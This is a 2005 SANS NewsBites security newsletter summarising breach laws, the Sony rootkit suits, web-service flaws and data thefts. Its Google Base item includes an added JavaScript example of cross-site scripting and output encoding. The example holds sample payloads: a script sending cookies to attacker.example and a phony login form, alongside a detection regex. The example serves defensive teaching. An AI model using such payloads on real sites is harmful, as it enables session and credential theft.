SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume VII - Issue #55
November 22, 2005
TOP OF THE NEWS
SANS Top 20 Internet Security Vulnerability Shows Attackers Are Using New Approaches For Which Users Are Not Prepared
Senate Panels Approve Data Security Breach and Spyware Bills
Sony BMG Faces More Legal Challenges Over Rootkit DRM Software
Survey: IT Execs Say Security Will Top IT Spending List in 2006
THE REST OF THE WEEK'S NEWS
ARRESTS, CONVICTIONS AND SENTENCES
Spammer Sentenced to One Year in Prison
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
Proof-of-Concept Code Available for Unpatched IE Flaw
Google Fixes Flaws in Gmail and Google Base
Macromedia Issues Patches for Trio of Flaws
ATTACKS & INTRUSIONS & DATA THEFT
Indiana University Business School Informs Students of Data Security Breach
Boeing Employee Data on Stolen Laptop
STATISTICS, STUDIES & SURVEYS
Irish IT Security Awareness Campaign Survey Finds Few Informed About Spyware and Phishing
Botnets Get Lean to Avoid Detection
************************** Security Training Update: ********************
"SANS has the answers to real-life problems and can fill in the education gaps that on the job training causes." Carol Templeton, Univ. of Tennessee
SANS 2006 brochures have started arriving in mail boxes. More immersion training tracks than ever before. Plus many new short courses for people who already have mastered their areas of security. A big security tools exposition. And Orlando in February is great.
SANS training at home or at your place of employment or in other cities:
"With SANS training, leading industry professionals share the latest knowledge and practices that work for them - you can not get this information anywhere else!" Douglas K Shamlin, US Navy
"I can not believe how much I learned in 6 days!" Kenny Johnson, US Air Force
TOP OF THE NEWS
SANS Top 20 Internet Security Vulnerability Shows Attackers Are Using New Approaches For Which Users Are Not Prepared (22 November 2005) The SANS Institute and the United Kingdom National Infrastructure Security Coordination Centre today announced the 2005 Top 20 Internet Security Vulnerabilities. The new report shows attackers are increasingly targeting security software, backup software, and network security and communication devices that users (a) thought were keeping them safe and (b) do not patch. The new threat sets defenders back six years in their fight against attackers.
Senate Panels Approve Data Security Breach and Spyware Bills (21/18 November 2005) Senate panels have approved two privacy-related bills. The Senate Judiciary Committee has approved the Personal Data Privacy and Security Act, which would require organizations that keep personal data for more than 10,000 people to implement privacy and security programs. It also allows people to examine their information and correct errors. Companies that experience security breaches must inform those whose data were compromised if the company determines there is a significant risk of identity or data fraud; if the company determines there is no risk, it must submit its findings to the US Secret Service, which may then conduct its own investigation. If the bill becomes law, it would preempt state data privacy laws. The Senate Commerce Committee approved the SPY BLOCK Act, which would require that users be informed when programs pose a privacy threat and provide users with an easy way to uninstall spyware. It also makes it a crime to install software on computers without authorization. The SPY BLOCK Act now heads to the Senate floor.
[Editor's Note (Schneier): It's long past time that the U.S. had the same sort of data privacy protection that is standard in the EU. However, one of the biggest abusers of data privacy these days seems to be the U.S. government. And they keep exempting new databases from what little privacy laws we now have. Will they be subject to the laws being contemplated?
(Honan): The Personal Data Privacy and Security Act is a step in the right direction but ideally should apply to all organizations that keep personal data and not just those that keep personal data for more than 10,000 people.
(Grefer): Federal legislation should set a _minimum_ standard, rather than pre-empting or annulling more stringent state legislation. Otherwise the work of a few well-placed lobbyists all too often works to the detriment of the taxpaying consumers. ]
Sony BMG Faces More Legal Challenges Over Rootkit DRM Software (21 November 2005) Texas Attorney General Greg Abbott has filed a civil lawsuit against Sony BMG alleging that the software the XCP DRM system deposits on customers' computers leaves those computers vulnerable to attackers. Texas' spyware law allows the state to collect as much as US$100,000 for each violation. The Electronic Frontier Foundation is also filing a lawsuit against Sony BMG; the suit is being filed under a California law that prohibits the collection of personally identifiable data and allows consumers to sue for damages. Finally, it appears that First4Internet, the company that developed the XCP DRM software, violated copyright law by using a chunk of code written by someone else "without observing the terms under which it is distributed."
[Editor's Note (Schultz): The many problems that have resulted from Sony's release of its DRM software are bound to make any entity that considers developing and releasing similar software think again. Any organization bent on avoiding piracy is clearly going to have to take another approach.
(Shpantzer): You know you're having a bad PR day when your product appears in the Consumer Protection section of the AG of a major state:
Survey: IT Execs Say Security Will Top IT Spending List in 2006 (21 November 2005) A survey by Goldman Sachs & Co. of 100 IT executives found that security software and enterprise IT upgrades are expected to top their IT spending lists in 2006. Fifty-two percent of those surveyed said they expected IT spending levels to be unchanged, while forty percent said they were considering reducing their IT budgets for 2006.
[Editor's Note (Pescatore): The article continues an area of much confusion: compliant does *not* mean secure, and spending on compliance does *not* always mean increasing security. There has been no shortage of user account information being stolen from companies who had no problem passing their Sarbanes Oxley audits. Spending to get secure and then prove compliance is one thing. Justifying spending because of "compliance" is very different - and there is a lot of this going on.
(Ranum): This may be skewed by the fact that a great deal of spending on lawyers and compliance auditing is being reported as "security spending." ]
***************************** Sponsored Link: *************************
1) Earn your Master's degree in Information Security from an NSA-recognized online program.
THE REST OF THE WEEK'S NEWS
ARRESTS, CONVICTIONS AND SENTENCES
Spammer Sentenced to One Year in Prison (17 November 2005) Peter Moshou, sometimes known as the "Timeshare Spammer", was sentenced to one year in federal prison and ordered to pay US$120,000 in restitution for sending millions of spam messages in 2004 and 2005. Mr. Moshou was convicted in June of violating the CAN-SPAM Act; he had been named in a lawsuit filed by EarthLink. EarthLink also said that it has won a US$15.4 million judgment against Craig Brockwell and BC Alliance Inc. in a suit that claimed Mr. Brockwell and his company sent hundreds of thousands of unsolicited email messages.
WORMS, ACTIVE EXPLOITS, VULNERABILITIES & PATCHES
Google Fixes Flaws in Gmail and Google Base (21/18 November 2005) Google has fixed a flaw in its Gmail service that could have allowed attackers to take control of users' accounts; exploit details have been released. Google maintains that the vulnerability could be exploited only if the attacker has possession of a user's authentication token, a string that appears in the address bar after the user logs in and that is protected by encryption. A token carried in the URL is, however, visible to anything that sees the URL, such as browser history, proxy logs and the Referer header sent when the user follows a link, so "possession" is a weaker barrier than it sounds. In a separate story, Google has fixed a cross-site scripting vulnerability in its new content hosting service, Google Base, that could have allowed attackers to steal cookies and other sensitive information from other users. The problem also allowed attackers to embed phony forms within Google Base web pages. A beta version of Google Base was released on November 16, 2005.
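The Google Base flaw above is a textbook output-encoding failure: text a user supplies in a listing reaches other users' browsers as live HTML. The following is an added example, not Google's code, of what that looks like on a listing page and how context-aware encoding stops both effects the item names (cookie theft and an injected phony form). The item structure, the render functions, the detection regex and the hostile listing (using the reserved attacker.example host) are all constructed for illustration.

```javascript
// Added example (not Google's code): a listing page that renders user-supplied
// text, first unsafely and then with context-aware output encoding.
// All items, hosts and payloads below are constructed samples.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for the HTML element-content and double-quoted-attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// URL-attribute context: HTML escaping does not neutralise "javascript:" URLs,
// so accept only absolute http(s) URLs and fall back to a harmless anchor.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    if (u.protocol === 'http:' || u.protocol === 'https:') return escapeHtml(u.href);
  } catch (_) {
    // not a parseable absolute URL
  }
  return '#';
}

// Vulnerable: untrusted fields are concatenated straight into the markup.
function renderItemUnsafe(item) {
  return `<div class="item"><h2><a href="${item.link}">${item.title}</a></h2>` +
         `<p>${item.description}</p></div>`;
}

// Hardened: every untrusted field is encoded for the context it lands in.
function renderItemSafe(item) {
  return `<div class="item"><h2><a href="${safeHref(item.link)}">${escapeHtml(item.title)}</a></h2>` +
         `<p>${escapeHtml(item.description)}</p></div>`;
}

// Constructed hostile listing: a cookie-stealing script, a phony login form
// (the two effects the news item describes) and a javascript: link.
const HOSTILE_ITEM = {
  title: 'Cheap laptop',
  link: 'javascript:alert(document.cookie)',
  description:
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>' +
    '<form action="https://attacker.example/login"><input name="user">' +
    '<input name="pass" type="password"></form>',
};

// Detection used by the checks below: does the rendered HTML contain a tag
// or attribute that could execute script or submit data to the attacker?
function containsActiveMarkup(html) {
  return /<(script|form|iframe|img|svg)\b/i.test(html) ||
         /\son\w+\s*=/i.test(html) ||
         /href\s*=\s*["']?\s*javascript:/i.test(html);
}

// Stand-alone run: prints true (unsafe rendering) then false (safe rendering).
console.log(containsActiveMarkup(renderItemUnsafe(HOSTILE_ITEM)));
console.log(containsActiveMarkup(renderItemSafe(HOSTILE_ITEM)));
```

Encoding element content is only part of the fix: a listing's link lands in a URL attribute, where a javascript: URL survives HTML escaping, which is why safeHref restricts the scheme instead of escaping. In practice a template engine that escapes by default, plus the HttpOnly flag on the session cookie so injected script cannot read it, covers both of the effects the article names.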
Macromedia Issues Patches for Trio of Flaws (17/16 November 2005) Macromedia has released patches for three flaws in a handful of its products. The flaws make the products vulnerable to crashes and information disclosure. Affected products include Macromedia Flash Communication Server MX versions 1.0 and 1.5, Macromedia Breeze Communication Server and Live Server and Macromedia Contribute Publishing Server.
ATTACKS & INTRUSIONS & DATA THEFT
Indiana University Business School Informs Students of Data Security Breach (18/17 November 2005) Technicians at Indiana University discovered three malware programs on a Kelley School of Business instructor's computer during a routine scan earlier this month. The programs were believed to have been installed in August 2005 and last accessed in October 2005. The laptop computer contains personal information belonging to 5,278 students who took a certain Introduction to Business course between 2001 and 2005; all have been sent a letter informing them of the security breach. The dean of the business school said all computers at the school are being audited to ensure proper configuration to allow automatic anti-virus and system software updates. A web site has been set up to address student concerns.
Boeing Employee Data on Stolen Laptop (19/18 November 2005) Boeing has acknowledged that a recently stolen laptop computer contained sensitive data belonging to more than 160,000 current and former employees. The laptop was stolen from an off-site location. Among the data on the computer are Social Security numbers, banking information and birth dates. Boeing is notifying everyone whose data were on the computer and will pay for enrollment in credit monitoring and fraud protection programs. Authorities have been notified as well.
[Editor's Note (Pescatore): Of course, the important question is: why was that data on a laptop? Having seen a number of HR applications, the most likely reason is that the standard HR application wouldn't give the user the reporting they wanted, so they downloaded the entire file to a PC to do spreadsheet reporting. This is a common reason why structured data shows up in so many unstructured places.
(Hayler): With so many products available to protect mobile data, it is amazing that stories like these are so common. A simple encryption package would have kept the employees' data safe and therefore saved the company money. ]
STATISTICS, STUDIES & SURVEYS
Irish IT Security Awareness Campaign Survey Finds Few Informed About Spyware and Phishing (17 November 2005) A survey conducted on behalf of Ireland's Make IT Secure Initiative found that 24 percent of those polled know what spyware is and just 13 percent feel they have a good understanding of what phishing is. However, 79 percent of home users and 75 percent of work users use anti-virus software. The public awareness campaign focuses on educating users about phishing, spyware, identity fraud and online child safety.
[Editor's Note (Ranum): A year ago, IT managers' attitude toward spyware was "What, me worry?" Now, spyware is going to (unfortunately) introduce the Windows computing world to the notion of trusted software distribution, transitive trust, and why a trusted computing base really is necessary. ]
Botnets Get Lean to Avoid Detection (16 November 2005) The average size of a botnet, a network of zombie PCs, has dropped from over 100,000 to 20,000 during the past two years. The change may be due to the fact that botnet operators have figured out that a smaller network makes them harder to detect and stop. Other explanations for the decrease in botnet size are the increasingly competitive environment for compromised PCs and the increased levels of security home users with broadband connections are taking to protect their computers from would-be infiltrators. Botnets are used to send spam and phishing email as well as to launch distributed denial-of-service (DDoS) attacks.
[Editor's Note (Grefer): Home users with broadband connections should install a router, such as the Linksys BEFSR41, between their DSL/cable modem and their computer/network, and have personal firewall software running on each computer. Antivirus software and anti-spyware products (such as Spybot Search & Destroy) round out the baseline setup. ]
NewsBites Editorial Board:
Kathy Bradford, Rohit Dhamankar, Roland Grefer, Richard Hayler, Jaap-Henk Hoepman, Brian Honan, Stephen Northcutt, Alan Paller, John Pescatore, Marcus Ranum, Howard Schmidt, Bruce Schneier, Eugene Schultz, Gal Shpantzer, Koon Yaw Tan
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit